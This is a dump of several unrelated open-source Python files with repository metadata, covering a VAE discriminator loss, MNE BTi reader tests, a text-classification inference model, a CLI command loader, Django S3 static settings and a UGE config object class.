implementation, `log(q(z-)) - log(q(z))` is referred as `total correlation loss`, here, we return `log(q(z)) - log(q(z-))` as the total correlation for the construction of the ELBO in Eq(2) Arguments: qz_x : a Tensor, [batch_dim, latent_dim] or Distribution Return: TC(z) : a scalar, approximation of the density-ratio that arises in the KL-term. """ z = self._to_samples(qz_x, stop_grad=False) logits = self(z, training=training) logits = self._tc_logits(logits) # in case using sigmoid, other implementation use -logits here but it # should be logits. # if it is negative here, TC is reduce, but reasonably, it must be positive (?) return tf.reduce_mean(logits) def dtc_loss(self, qz_x: Distribution, qz_xprime: Optional[Distribution] = None, training: Optional[bool] = None) -> tf.Tensor: r""" Discriminated total correlation loss Algorithm(2) Minimize the probability of: - `q(z)` misclassified as `D(z)[:, 0]` - `q(z')` misclassified as `D(z')[:, 1]` Arguments: qz_x : `Tensor` or `Distribution`. Samples of the latents from first batch qz_xprime : `Tensor` or `Distribution` (optional). Samples of the latents from second batch, this will be permuted. If not given, then reuse `qz_x`. Return: scalar - loss value for training the discriminator """ # we don't want the gradient to be propagated to the encoder z = self._to_samples(qz_x, stop_grad=True) z_logits = self._tc_logits(self(z, training=training)) # using log_softmax function give more numerical stabalized results than # logsumexp yourself. d_z = -tf.math.log_sigmoid(z_logits) # must be negative here # for X_prime if qz_xprime is not None: z = self._to_samples(qz_xprime, stop_grad=True) z_perm = permute_dims(z) zperm_logits = self._tc_logits(self(z_perm, training=training)) d_zperm = -tf.math.log_sigmoid(zperm_logits) # also negative here # reduce the negative of d_z, and the positive of d_zperm # this equal to cross_entropy(d_z, zeros) + cross_entropy(d_zperm, ones) loss = 0.5 * (tf.reduce_mean(d_z) + tf.reduce_mean(zperm_logits + d_zperm)) return loss def supervised_loss(self, labels: Union[tf.Tensor, List[tf.Tensor]], qz_x: Distribution, mean: bool = False, mask: Optional[tf.Tensor] = None, training: Optional[bool] = None) -> tf.Tensor: labels = as_tuple(labels) z = self._to_samples(qz_x, mean=mean, stop_grad=True) distributions = as_tuple(self(z, training=training)) ## applying the mask (1-labelled, 0-unlabelled) if mask is not None: mask = tf.reshape(mask, (-1,)) # labels = [tf.boolean_mask(y, mask, axis=0) for y in labels] # z_logits = tf.boolean_mask(z_logits, mask, axis=0) ## calculate the loss loss = 0. for dist, y_true in zip(distributions, labels): llk = dist.log_prob(y_true) # check the mask careful here # if no data for labels, just return 0 if mask is not None: llk = tf.cond(tf.reduce_all(tf.logical_not(mask)), lambda: 0., lambda: tf.boolean_mask(llk, mask, axis=0)) # negative log-likelihood here loss += -llk # check non-zero, if zero the gradient must be stop or NaN gradient happen loss = tf.reduce_mean(loss) loss = tf.cond( tf.abs(loss) < 1e-8, lambda: tf.stop_gradient(loss), lambda: loss) return loss @property def n_observation(self) -> int: return len(self.observation) @property def distributions(self) -> List[DistributionDense]: return self._distributions @property def prior(self) -> List[Distribution]: return [d.prior for d in self._distributions] def __str__(self): s = super().__str__() s1 = ['\n Outputs:'] for i, d in enumerate(self.distributions): s1.append(f' [{i}]{d}') return s + '\n'.join(s1)
37.741259
83
0.626089
2c5ba8347f7943822934181859ccece4355cd9dd
11,903
py
Python
mne/io/bti/tests/test_bti.py
mvdoc/mne-python
bac50dd08361b10d0a65c614ea2de06308750411
[ "BSD-3-Clause" ]
null
null
null
mne/io/bti/tests/test_bti.py
mvdoc/mne-python
bac50dd08361b10d0a65c614ea2de06308750411
[ "BSD-3-Clause" ]
null
null
null
mne/io/bti/tests/test_bti.py
mvdoc/mne-python
bac50dd08361b10d0a65c614ea2de06308750411
[ "BSD-3-Clause" ]
null
null
null
from __future__ import print_function # Authors: Denis Engemann <denis.engemann@gmail.com> # # License: BSD (3-clause) import os import os.path as op from functools import reduce, partial import warnings import numpy as np from numpy.testing import (assert_array_almost_equal, assert_array_equal, assert_allclose) from nose.tools import assert_true, assert_raises, assert_equal from mne.io import read_raw_fif, read_raw_bti from mne.io.bti.bti import (_read_config, _process_bti_headshape, _read_bti_header, _get_bti_dev_t, _correct_trans, _get_bti_info) from mne.io.tests.test_raw import _test_raw_reader from mne.tests.common import assert_dig_allclose from mne.io.pick import pick_info from mne.io.constants import FIFF from mne import pick_types from mne.utils import run_tests_if_main, slow_test from mne.transforms import Transform, combine_transforms, invert_transform from mne.externals import six warnings.simplefilter('always') base_dir = op.join(op.abspath(op.dirname(__file__)), 'data') archs = 'linux', 'solaris' pdf_fnames = [op.join(base_dir, 'test_pdf_%s' % a) for a in archs] config_fnames = [op.join(base_dir, 'test_config_%s' % a) for a in archs] hs_fnames = [op.join(base_dir, 'test_hs_%s' % a) for a in archs] exported_fnames = [op.join(base_dir, 'exported4D_%s_raw.fif' % a) for a in archs] tmp_raw_fname = op.join(base_dir, 'tmp_raw.fif') # the 4D exporter doesn't export all channels, so we confine our comparison NCH = 248 def test_read_config(): """Test read bti config file.""" # for config in config_fname, config_solaris_fname: for config in config_fnames: cfg = _read_config(config) assert_true(all('unknown' not in block.lower() and block != '' for block in cfg['user_blocks'])) def test_crop_append(): """Test crop and append raw.""" raw = _test_raw_reader( read_raw_bti, pdf_fname=pdf_fnames[0], config_fname=config_fnames[0], head_shape_fname=hs_fnames[0]) y, t = raw[:] t0, t1 = 0.25 * t[-1], 0.75 * t[-1] mask = (t0 <= t) * (t <= t1) raw_ = raw.copy().crop(t0, t1) y_, _ = raw_[:] assert_true(y_.shape[1] == mask.sum()) assert_true(y_.shape[0] == y.shape[0]) def test_transforms(): """Test transformations.""" bti_trans = (0.0, 0.02, 0.11) bti_dev_t = Transform('ctf_meg', 'meg', _get_bti_dev_t(0.0, bti_trans)) for pdf, config, hs, in zip(pdf_fnames, config_fnames, hs_fnames): raw = read_raw_bti(pdf, config, hs, preload=False) dev_ctf_t = raw.info['dev_ctf_t'] dev_head_t_old = raw.info['dev_head_t'] ctf_head_t = raw.info['ctf_head_t'] # 1) get BTI->Neuromag bti_dev_t = Transform('ctf_meg', 'meg', _get_bti_dev_t(0.0, bti_trans)) # 2) get Neuromag->BTI head t = combine_transforms(invert_transform(bti_dev_t), dev_ctf_t, 'meg', 'ctf_head') # 3) get Neuromag->head dev_head_t_new = combine_transforms(t, ctf_head_t, 'meg', 'head') assert_array_equal(dev_head_t_new['trans'], dev_head_t_old['trans']) @slow_test def test_raw(): """Test bti conversion to Raw object.""" for pdf, config, hs, exported in zip(pdf_fnames, config_fnames, hs_fnames, exported_fnames): # rx = 2 if 'linux' in pdf else 0 assert_raises(ValueError, read_raw_bti, pdf, 'eggs', preload=False) assert_raises(ValueError, read_raw_bti, pdf, config, 'spam', preload=False) if op.exists(tmp_raw_fname): os.remove(tmp_raw_fname) ex = read_raw_fif(exported, preload=True) ra = read_raw_bti(pdf, config, hs, preload=False) assert_true('RawBTi' in repr(ra)) assert_equal(ex.ch_names[:NCH], ra.ch_names[:NCH]) assert_array_almost_equal(ex.info['dev_head_t']['trans'], ra.info['dev_head_t']['trans'], 7) assert_dig_allclose(ex.info, ra.info) coil1, coil2 = [np.concatenate([d['loc'].flatten() for d in r_.info['chs'][:NCH]]) for r_ in (ra, ex)] assert_array_almost_equal(coil1, coil2, 7) loc1, loc2 = [np.concatenate([d['loc'].flatten() for d in r_.info['chs'][:NCH]]) for r_ in (ra, ex)] assert_allclose(loc1, loc2) assert_allclose(ra[:NCH][0], ex[:NCH][0]) assert_array_equal([c['range'] for c in ra.info['chs'][:NCH]], [c['range'] for c in ex.info['chs'][:NCH]]) assert_array_equal([c['cal'] for c in ra.info['chs'][:NCH]], [c['cal'] for c in ex.info['chs'][:NCH]]) assert_array_equal(ra._cals[:NCH], ex._cals[:NCH]) # check our transforms for key in ('dev_head_t', 'dev_ctf_t', 'ctf_head_t'): if ex.info[key] is None: pass else: assert_true(ra.info[key] is not None) for ent in ('to', 'from', 'trans'): assert_allclose(ex.info[key][ent], ra.info[key][ent]) ra.save(tmp_raw_fname) re = read_raw_fif(tmp_raw_fname) print(re) for key in ('dev_head_t', 'dev_ctf_t', 'ctf_head_t'): assert_true(isinstance(re.info[key], dict)) this_t = re.info[key]['trans'] assert_equal(this_t.shape, (4, 4)) # cehck that matrix by is not identity assert_true(not np.allclose(this_t, np.eye(4))) os.remove(tmp_raw_fname) def test_info_no_rename_no_reorder_no_pdf(): """Test private renaming, reordering and partial construction option.""" for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames): info, bti_info = _get_bti_info( pdf_fname=pdf, config_fname=config, head_shape_fname=hs, rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False, ecg_ch='E31', eog_ch=('E63', 'E64'), rename_channels=False, sort_by_ch_name=False) info2, bti_info = _get_bti_info( pdf_fname=None, config_fname=config, head_shape_fname=hs, rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False, ecg_ch='E31', eog_ch=('E63', 'E64'), rename_channels=False, sort_by_ch_name=False) assert_equal(info['ch_names'], [ch['ch_name'] for ch in info['chs']]) assert_equal([n for n in info['ch_names'] if n.startswith('A')][:5], ['A22', 'A2', 'A104', 'A241', 'A138']) assert_equal([n for n in info['ch_names'] if n.startswith('A')][-5:], ['A133', 'A158', 'A44', 'A134', 'A216']) info = pick_info(info, pick_types(info, meg=True, stim=True, resp=True)) info2 = pick_info(info2, pick_types(info2, meg=True, stim=True, resp=True)) assert_true(info['sfreq'] is not None) assert_true(info['lowpass'] is not None) assert_true(info['highpass'] is not None) assert_true(info['meas_date'] is not None) assert_equal(info2['sfreq'], None) assert_equal(info2['lowpass'], None) assert_equal(info2['highpass'], None) assert_equal(info2['meas_date'], None) assert_equal(info['ch_names'], info2['ch_names']) assert_equal(info['ch_names'], info2['ch_names']) for key in ['dev_ctf_t', 'dev_head_t', 'ctf_head_t']: assert_array_equal(info[key]['trans'], info2[key]['trans']) assert_array_equal( np.array([ch['loc'] for ch in info['chs']]), np.array([ch['loc'] for ch in info2['chs']])) # just check reading data | corner case raw1 = read_raw_bti( pdf_fname=pdf, config_fname=config, head_shape_fname=None, sort_by_ch_name=False, preload=True) # just check reading data | corner case raw2 = read_raw_bti( pdf_fname=pdf, config_fname=config, head_shape_fname=None, rename_channels=False, sort_by_ch_name=True, preload=True) sort_idx = [raw1.bti_ch_labels.index(ch) for ch in raw2.bti_ch_labels] raw1._data = raw1._data[sort_idx] assert_array_equal(raw1._data, raw2._data) assert_array_equal(raw2.bti_ch_labels, raw2.ch_names) def test_no_conversion(): """Test bti no-conversion option.""" get_info = partial( _get_bti_info, rotation_x=0.0, translation=(0.0, 0.02, 0.11), convert=False, ecg_ch='E31', eog_ch=('E63', 'E64'), rename_channels=False, sort_by_ch_name=False) for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames): raw_info, _ = get_info(pdf, config, hs, convert=False) raw_info_con = read_raw_bti( pdf_fname=pdf, config_fname=config, head_shape_fname=hs, convert=True, preload=False).info pick_info(raw_info_con, pick_types(raw_info_con, meg=True, ref_meg=True), copy=False) pick_info(raw_info, pick_types(raw_info, meg=True, ref_meg=True), copy=False) bti_info = _read_bti_header(pdf, config) dev_ctf_t = _correct_trans(bti_info['bti_transform'][0]) assert_array_equal(dev_ctf_t, raw_info['dev_ctf_t']['trans']) assert_array_equal(raw_info['dev_head_t']['trans'], np.eye(4)) assert_array_equal(raw_info['ctf_head_t']['trans'], np.eye(4)) dig, t = _process_bti_headshape(hs, convert=False, use_hpi=False) assert_array_equal(t['trans'], np.eye(4)) for ii, (old, new, con) in enumerate(zip( dig, raw_info['dig'], raw_info_con['dig'])): assert_equal(old['ident'], new['ident']) assert_array_equal(old['r'], new['r']) assert_true(not np.allclose(old['r'], con['r'])) if ii > 10: break ch_map = dict((ch['chan_label'], ch['loc']) for ch in bti_info['chs']) for ii, ch_label in enumerate(raw_info['ch_names']): if not ch_label.startswith('A'): continue t1 = ch_map[ch_label] # correction already performed in bti_info t2 = raw_info['chs'][ii]['loc'] t3 = raw_info_con['chs'][ii]['loc'] assert_allclose(t1, t2, atol=1e-15) assert_true(not np.allclose(t1, t3)) idx_a = raw_info_con['ch_names'].index('MEG 001') idx_b = raw_info['ch_names'].index('A22') assert_equal( raw_info_con['chs'][idx_a]['coord_frame'], FIFF.FIFFV_COORD_DEVICE) assert_equal( raw_info['chs'][idx_b]['coord_frame'], FIFF.FIFFV_MNE_COORD_4D_HEAD) def test_bytes_io(): """Test bti bytes-io API.""" for pdf, config, hs in zip(pdf_fnames, config_fnames, hs_fnames): raw = read_raw_bti(pdf, config, hs, convert=True, preload=False) with open(pdf, 'rb') as fid: pdf = six.BytesIO(fid.read()) with open(config, 'rb') as fid: config = six.BytesIO(fid.read()) with open(hs, 'rb') as fid: hs = six.BytesIO(fid.read()) raw2 = read_raw_bti(pdf, config, hs, convert=True, preload=False) repr(raw2) assert_array_equal(raw[:][0], raw2[:][0]) def test_setup_headshape(): """Test reading bti headshape.""" for hs in hs_fnames: dig, t = _process_bti_headshape(hs) expected = set(['kind', 'ident', 'r']) found = set(reduce(lambda x, y: list(x) + list(y), [d.keys() for d in dig])) assert_true(not expected - found) run_tests_if_main()
40.763699
79
0.598925
ee2c5a4ca0335fd4df6a6c96f0bf2e837077db6b
4,974
py
Python
examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py
FinchZHU/uai-sdk
78e06bebba2d18233ce6dcb5be619e940f7a7ef3
[ "Apache-2.0" ]
38
2017-04-26T04:00:09.000Z
2022-02-10T02:51:05.000Z
examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py
FinchZHU/uai-sdk
78e06bebba2d18233ce6dcb5be619e940f7a7ef3
[ "Apache-2.0" ]
17
2017-11-20T20:47:09.000Z
2022-02-09T23:48:46.000Z
examples/tensorflow/inference/text-classification-ch/code/txt_cnn_rnn_inference.py
FinchZHU/uai-sdk
78e06bebba2d18233ce6dcb5be619e940f7a7ef3
[ "Apache-2.0" ]
28
2017-07-08T05:23:13.000Z
2020-08-18T03:12:27.000Z
# Copyright 2017 The UAI-SDK Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """A text classification cnn/rnn inferencer. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import sys from PIL import Image import numpy as np import tensorflow as tf import tensorflow.contrib.keras as kr from cnn_model import TCNNConfig, TextCNN from rnn_model import TRNNConfig, TextRNN from cnews_loader import read_vocab, read_category from uai.arch.tf_model import TFAiUcloudModel if sys.version_info[0] > 2: is_py3 = True else: reload(sys) sys.setdefaultencoding("utf-8") is_py3 = False class TxtClassModel(TFAiUcloudModel): """ TxtClass example model """ def __init__(self, conf): super(TxtClassModel, self).__init__(conf) def load_model(self): pass def preprocess(self, data): return data.body def execute(self, data, batch_size): pass class TxtClassCNNModel(TxtClassModel): """ TxtClass example model """ def __init__(self, conf): super(TxtClassCNNModel, self).__init__(conf) def load_model(self): sess = tf.Session() print('Configuring CNN model...') config = TCNNConfig() cnn_model = TextCNN(config) saver = tf.train.Saver() params_file = tf.train.latest_checkpoint(self.model_dir) saver.restore(sess, params_file) categories, cat_to_id = read_category() vocab_dir = 'cnews/cnews.vocab.txt' words, word_to_id = read_vocab(vocab_dir) self.words = words self.word_to_id = word_to_id self.categories = categories self.cat_to_id = cat_to_id self.cnn_model = cnn_model self.sess = sess print(self.cnn_model) print(self.sess) def native_content(self, content): if not is_py3: return content.decode('utf-8') else: return content def execute(self, data, batch_size): contents, labels = [], [] ret = [None] * batch_size for i in range(batch_size): line = self.preprocess(data[i]) contents.append(list(self.native_content(line))) data_id = [] for i in range(len(contents)): data_id.append([self.word_to_id[x] for x in contents[i] if x in self.word_to_id]) x_pad = kr.preprocessing.sequence.pad_sequences(data_id, 600) print(self.cnn_model) print(self.sess) feed_dict = { self.cnn_model.input_x: x_pad, self.cnn_model.keep_prob: 1.0 } results = self.sess.run(self.cnn_model.y_pred_cls, feed_dict=feed_dict) i = 0 for res in results: if ret[i] != None: i=i+1 continue ret[i] = self.categories[res] i=i+1 return ret class TxtClassRNNModel(TxtClassModel): """ TxtClass example model """ def __init__(self, conf): super(TxtClassRNNModel, self).__init__(conf) def load_model(self): sess = tf.Session() print('Configuring CNN model...') config = TRNNConfig() cnn_model = TextRNN(config) saver = tf.train.Saver() params_file = tf.train.latest_checkpoint(self.model_dir) saver.restore(sess, params_file) categories, cat_to_id = read_category() vocab_dir = 'cnews/cnews.vocab.txt' words, word_to_id = read_vocab(vocab_dir) self.words = words self.word_to_id = word_to_id self.categories = categories self.cat_to_id = cat_to_id self.cnn_model = cnn_model self.sess = sess print(self.cnn_model) print(self.sess) def native_content(self, content): if not is_py3: return content.decode('utf-8') else: return content def execute(self, data, batch_size): contents, labels = [], [] ret = [None] * batch_size for i in range(batch_size): line = self.preprocess(data[i]) contents.append(list(self.native_content(line))) data_id= [] for i in range(len(contents)): data_id.append([self.word_to_id[x] for x in contents[i] if x in self.word_to_id]) x_pad = kr.preprocessing.sequence.pad_sequences(data_id, 600) print(self.cnn_model) print(self.sess) feed_dict = { self.cnn_model.input_x: x_pad, self.cnn_model.keep_prob: 1.0 } results = self.sess.run(self.cnn_model.y_pred_cls, feed_dict=feed_dict) i = 0 for res in results: if ret[i] != None: i=i+1 continue ret[i] = self.categories[res] i=i+1 return ret
24.994975
87
0.674507
215e104c08bebb62fff7b125bf9ae814fc4734c7
2,477
py
Python
msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py
thewahome/msgraph-cli
33127d9efa23a0e5f5303c93242fbdbb73348671
[ "MIT" ]
null
null
null
msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py
thewahome/msgraph-cli
33127d9efa23a0e5f5303c93242fbdbb73348671
[ "MIT" ]
null
null
null
msgraph-cli-extensions/v1_0/usersfunctions_v1_0/azext_usersfunctions_v1_0/__init__.py
thewahome/msgraph-cli
33127d9efa23a0e5f5303c93242fbdbb73348671
[ "MIT" ]
null
null
null
# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msgraph.cli.core import AzCommandsLoader from azext_usersfunctions_v1_0.generated._help import helps # pylint: disable=unused-import try: from azext_usersfunctions_v1_0.manual._help import helps # pylint: disable=reimported except ImportError as e: if e.name.endswith('manual._help'): pass else: raise e class UsersFunctionsCommandsLoader(AzCommandsLoader): def __init__(self, cli_ctx=None): from msgraph.cli.core.commands import CliCommandType from azext_usersfunctions_v1_0.generated._client_factory import cf_usersfunctions_v1_0_cl usersfunctions_v1_0_custom = CliCommandType( operations_tmpl='azext_usersfunctions_v1_0.custom#{}', client_factory=cf_usersfunctions_v1_0_cl) parent = super(UsersFunctionsCommandsLoader, self) parent.__init__(cli_ctx=cli_ctx, custom_command_type=usersfunctions_v1_0_custom) def load_command_table(self, args): from azext_usersfunctions_v1_0.generated.commands import load_command_table load_command_table(self, args) try: from azext_usersfunctions_v1_0.manual.commands import load_command_table as load_command_table_manual load_command_table_manual(self, args) except ImportError as e: if e.name.endswith('manual.commands'): pass else: raise e return self.command_table def load_arguments(self, command): from azext_usersfunctions_v1_0.generated._params import load_arguments load_arguments(self, command) try: from azext_usersfunctions_v1_0.manual._params import load_arguments as load_arguments_manual load_arguments_manual(self, command) except ImportError as e: if e.name.endswith('manual._params'): pass else: raise e COMMAND_LOADER_CLS = UsersFunctionsCommandsLoader
41.283333
114
0.656036
613ad19cafaf9e4be28fc4a62e1dafa5ad488c82
1,187
py
Python
docs/partial-settings.py
alexisbellido/znbstatic
ad20160c43ab33504dfb67007d6e93ced522a77f
[ "BSD-3-Clause" ]
null
null
null
docs/partial-settings.py
alexisbellido/znbstatic
ad20160c43ab33504dfb67007d6e93ced522a77f
[ "BSD-3-Clause" ]
8
2019-12-04T22:18:20.000Z
2021-09-22T17:48:33.000Z
docs/partial-settings.py
alexisbellido/znbstatic
ad20160c43ab33504dfb67007d6e93ced522a77f
[ "BSD-3-Clause" ]
null
null
null
# Add the following settings to your Django project's settings.py. # AWS S3 settings common to static and media files AWS_ACCESS_KEY_ID = CONFIG['aws']['s3_static']['AWS_ACCESS_KEY_ID'] AWS_SECRET_ACCESS_KEY = CONFIG['aws']['s3_static']['AWS_SECRET_ACCESS_KEY'] AWS_S3_HOST = 's3.amazonaws.com' AWS_IS_GZIPPED = True S3_USE_SIGV4 = True AWS_QUERYSTRING_AUTH = False AWS_DEFAULT_ACL = 'public-read' # Headers' names written without dashes for AWS and Boto3. AWS_S3_OBJECT_PARAMETERS = { 'Expires': 'Thu, Dec 31, 2099 20:00:00 GMT', 'CacheControl': 'max-age=86400', } # set environment variable in pod specs STATIC_FILES_LOCAL = True if get_env_variable('STATIC_FILES_LOCAL') == '1' else False if STATIC_FILES_LOCAL: # hosting static files locally STATICFILES_STORAGE = 'znbstatic.storage.VersionedStaticFilesStorage' STATIC_URL = '/static/' else: # hosting static files on AWS S3 STATICFILES_STORAGE = 'znbstatic.storage.VersionedS3StaticFilesStorage' AWS_STORAGE_STATIC_BUCKET_NAME = CONFIG['aws']['s3_static']['AWS_STORAGE_STATIC_BUCKET_NAME'] STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_STATIC_BUCKET_NAME ZNBSTATIC_VERSION = '0.4'
39.566667
97
0.764954
71d5db7fa53fedf2f33c35634362fb4d0dc54bd3
283
py
Python
package/awesome_panel/designer/components/component_with_error.py
Jhsmit/awesome-panel
53f7754f7c505a2666f6724df26c851ae942ec40
[ "Apache-2.0" ]
179
2019-12-04T14:54:53.000Z
2022-03-30T09:08:38.000Z
package/awesome_panel/designer/components/component_with_error.py
Jhsmit/awesome-panel
53f7754f7c505a2666f6724df26c851ae942ec40
[ "Apache-2.0" ]
62
2019-12-14T16:51:28.000Z
2022-03-19T18:47:12.000Z
package/awesome_panel/designer/components/component_with_error.py
Jhsmit/awesome-panel
53f7754f7c505a2666f6724df26c851ae942ec40
[ "Apache-2.0" ]
35
2019-12-08T13:19:53.000Z
2022-03-25T10:33:02.000Z
# pylint: disable=redefined-outer-name,protected-access # pylint: disable=missing-function-docstring,missing-module-docstring,missing-class-docstring # pylint: disable=too-few-public-methods class ComponentWithError: def __init__(self): raise NotImplementedError()
40.428571
94
0.777385
a29d7e71a93da2c4dc7a235c6820744c7884a9e2
1,907
py
Python
Crack/processor_Crack.py
neil7/Crack-Detection-Capsule-Network
2666280f48ddd42a32b301ded29a02906f7823cd
[ "Unlicense" ]
4
2018-12-20T20:41:38.000Z
2020-03-07T17:27:53.000Z
Crack/processor_Crack.py
neil7/Crack-Detection-Capsule-Network
2666280f48ddd42a32b301ded29a02906f7823cd
[ "Unlicense" ]
null
null
null
Crack/processor_Crack.py
neil7/Crack-Detection-Capsule-Network
2666280f48ddd42a32b301ded29a02906f7823cd
[ "Unlicense" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Wed Aug 29 12:02:20 2018 @author: Neil sharma """ from keras.preprocessing.image import img_to_array,load_img #from sklearn.preprocessing import StandardScaler import numpy as np import os from scipy.misc import imresize #import argparse image_store = [] #List of all Videos in the Source Directory. #videos=os.listdir(video_source_path) #Make a temp dir to store all the frames #os.mkdir(video_source_path + '/frames') ped1_path = r"D:\ML\Shrey Anomaly detection\Dataset\Crack\Data" paths = os.listdir(ped1_path) for path in paths: framepath = ped1_path + "/" + path """for video in videos: os.system( 'ffmpeg -i {}/{} -r 1/{} {}/frames/%03d.jpg'.format(video_source_path,video,fps,video_source_path))""" images = os.listdir(framepath) for image in images: #image_path = framepath + "/" + image image_path = framepath + "/" + image img = load_img(image_path) img = img_to_array(img) #Resize the Image to (224,224,3) for the network to be able to process it. img = imresize(img,(32,32,3)) #Convert the Image to Grayscale g = 0.2989*img[:,:,0] + 0.5870*img[:,:,1] + 0.1140*img[:,:,2] image_store.append(g) #store(image_path) image_store = np.array(image_store) image_store.shape a, b, c = image_store.shape #Reshape to (227,227,batch_size) image_store.resize(b,c,a) #Normalize image_store=(image_store-image_store.mean())/(image_store.std()) #Clip negative Values image_store=np.clip(image_store,0,1) #label = [] #label[0] = image_store[:, :, 343] np.save('Crack.npy',image_store) print("Saved file to disk")
28.893939
122
0.592554
3aec69bb37ebfd77583d9e158a2db81039f89d45
5,348
py
Python
uge/objects/qconf_dict_list.py
gridengine/config-api
694f9667bb6569170356336283a18351456e8b82
[ "Apache-2.0" ]
6
2017-01-18T00:11:19.000Z
2022-02-10T08:18:00.000Z
uge/objects/qconf_dict_list.py
gridengine/config-api
694f9667bb6569170356336283a18351456e8b82
[ "Apache-2.0" ]
3
2017-05-11T13:54:42.000Z
2020-08-12T06:15:43.000Z
uge/objects/qconf_dict_list.py
gridengine/config-api
694f9667bb6569170356336283a18351456e8b82
[ "Apache-2.0" ]
4
2017-05-11T13:27:33.000Z
2019-10-29T02:02:24.000Z
#!/usr/bin/env python # # ___INFO__MARK_BEGIN__ ####################################################################################### # Copyright 2016-2021 Univa Corporation (acquired and owned by Altair Engineering Inc.) # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use this file except in compliance with the License. # # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # limitations under the License. ####################################################################################### # ___INFO__MARK_END__ # from uge.exceptions import InvalidRequest try: import UserList except ImportError: import collections as UserList from .qconf_object import QconfObject from uge.exceptions.invalid_argument import InvalidArgument class QconfDictList(QconfObject, UserList.UserList): """ This class encapsulates data and functionality common to all Qconf objects based on a list of dictionaries. """ FIRST_KEY = None NAME_KEY = None USER_PROVIDED_KEYS = [] REQUIRED_DATA_DEFAULTS = {} KEY_VALUE_DELIMITER = '=' def __init__(self, data=None, metadata=None, json_string=None): """ Class constructor. :param data: Configuration data. If provided, it will override corresponding data from JSON string representation. :type data: dict :param metadata: Configuration metadata. If provided, it will override corresponding metadata from JSON string representation. :type metadata: dict :param json_string: Configuration JSON string representation. :type json_string: str :raises: **InvalidArgument** - in case metadata is not a dictionary, JSON string is not valid, or it does not represent a list of dictionaries object. """ UserList.UserList.__init__(self) QconfObject.__init__(self, data=data, metadata=metadata, json_string=json_string) def check_input_data(self, data): if type(data) != list: raise InvalidArgument('Provided data is not a list: %s.' % str(data)) for d in data: if type(d) != dict: raise InvalidArgument('List member is not a dictionary: %s.' % str(d)) def update_with_required_data_defaults(self): """ Updates list objects with default values for required data keys. :raises: **InvalidArgument** - in case object's data is not a list, or one of the list members is not a dictionary. """ if type(self.data) != list: raise InvalidRequest('Data object is not a list: %s.' % str(self.data)) for d in self.data: if type(d) != dict: raise InvalidArgument('List member is not a dictionary: %s.' % str(d)) for (key, value) in list(self.get_required_data_defaults().items()): if key not in d: d[key] = value def check_user_provided_keys(self): """ Checks for presence of all data keys that must be provided by user. :raises: **InvalidRequest** - in case object's data is not a dictionary, or if any of the required keys are missing. """ for d in self.data: if type(d) != dict: raise InvalidRequest('List member is not a dictionary: %s.' % str(d)) for key in self.USER_PROVIDED_KEYS: if not d.get(key): raise InvalidRequest('Input data %s is missing required object key: %s.' % (str(d), str(key))) def to_uge(self): """ Converts object to string acceptable as input for UGE qconf command. :returns: Object's UGE-formatted string. """ lines = '' for d in self.data: for (key, value) in list(d.items()): lines += '%s%s%s\n' % (key, self.KEY_VALUE_DELIMITER, self.py_to_uge(key, value)) return lines def convert_data_to_uge_keywords(self, data): for d in data: for (key, value) in list(d.items()): d[key] = self.py_to_uge(key, value) def set_data_dict_list_from_qconf_output(self, qconf_output): data = self.to_dict_list(qconf_output) self.data = data def to_dict_list(self, input_string): lines = input_string.split('\n') dict_list = [] object_data = {} # Parse lines until first object key is found, and then # create new dictionary object for line in lines: if not line: continue key_value = line.split(self.KEY_VALUE_DELIMITER) key = key_value[0] value = self.KEY_VALUE_DELIMITER.join(key_value[1:]).strip() if key == self.FIRST_KEY: object_data = {} dict_list.append(object_data) object_data[key] = self.uge_to_py(key, value) return dict_list ############################################################################# # Testing. if __name__ == '__main__': pass
38.47482
158
0.608826
0ce3cbf0db2e0a1fcb33a029f7ae581085246fc6
3,188
py
Python
pykeval/pykeval/broker/remote_server.py
SilverTuxedo/keval
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
[ "MIT" ]
34
2021-09-17T16:17:58.000Z
2022-03-11T06:23:21.000Z
pykeval/pykeval/broker/remote_server.py
fengjixuchui/keval
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
[ "MIT" ]
null
null
null
pykeval/pykeval/broker/remote_server.py
fengjixuchui/keval
73e2ccd5cbdf0cc7fc167711cde60be783e8dfe7
[ "MIT" ]
4
2021-09-17T19:39:29.000Z
2022-03-10T07:06:43.000Z
